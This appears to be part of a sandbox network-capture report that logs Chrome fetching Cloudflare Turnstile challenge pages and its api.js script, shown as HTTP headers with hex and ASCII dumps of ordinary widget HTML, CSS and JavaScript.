                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.1649714104.18.95.414436828C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 20:28:55 UTC797OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/7vyul/0x4AAAAAAAxHfCcO_DpISAPE/auto/fbE/normal/auto/ HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            sec-ch-ua-platform: "Windows"
                                                            Upgrade-Insecure-Requests: 1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Sec-Fetch-Site: cross-site
                                                            Sec-Fetch-Mode: navigate
                                                            Sec-Fetch-Dest: iframe
                                                            Referer: https://brh5.bughtswo.com/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 20:28:56 UTC1362INHTTP/1.1 200 OK
                                                            Date: Tue, 07 Jan 2025 20:28:55 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 26636
                                                            Connection: close
                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                            content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                            cross-origin-embedder-policy: require-corp
                                                            cross-origin-opener-policy: same-origin
                                                            cross-origin-resource-policy: cross-origin
                                                            origin-agent-cluster: ?1
                                                            accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                            critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                            referrer-policy: same-origin
                                                            document-policy: js-profiling
                                                            2025-01-07 20:28:56 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 65 36 62 32 37 31 65 39 35 61 31 39 63 62 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                            Data Ascii: Server: cloudflareCF-RAY: 8fe6b271e95a19cb-EWRalt-svc: h3=":443"; ma=86400
                                                            2025-01-07 20:28:56 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                            2025-01-07 20:28:56 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                            Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                            2025-01-07 20:28:56 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                            Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                            2025-01-07 20:28:56 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                            Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                            2025-01-07 20:28:56 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                            Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                            2025-01-07 20:28:56 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                            Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                            2025-01-07 20:28:56 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                            Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                            2025-01-07 20:28:56 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                            Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                            2025-01-07 20:28:56 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                            Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.1649713104.18.95.414436828C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 20:28:55 UTC383OUTGET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 20:28:56 UTC471INHTTP/1.1 200 OK
                                                            Date: Tue, 07 Jan 2025 20:28:56 GMT
                                                            Content-Type: application/javascript; charset=UTF-8
                                                            Content-Length: 47521
                                                            Connection: close
                                                            accept-ranges: bytes
                                                            last-modified: Thu, 02 Jan 2025 13:52:36 GMT
                                                            cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                            access-control-allow-origin: *
                                                            cross-origin-resource-policy: cross-origin
                                                            Server: cloudflare
                                                            CF-RAY: 8fe6b271f9b94375-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-07 20:28:56 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                            Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                            2025-01-07 20:28:56 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                            Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                            2025-01-07 20:28:56 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                            Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                            2025-01-07 20:28:56 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                            Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
                                                            2025-01-07 20:28:56 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                            Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                            2025-01-07 20:28:56 UTC1369INData Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61
                                                            Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
                                                            2025-01-07 20:28:56 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64
                                                            Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null||n===void 0?void
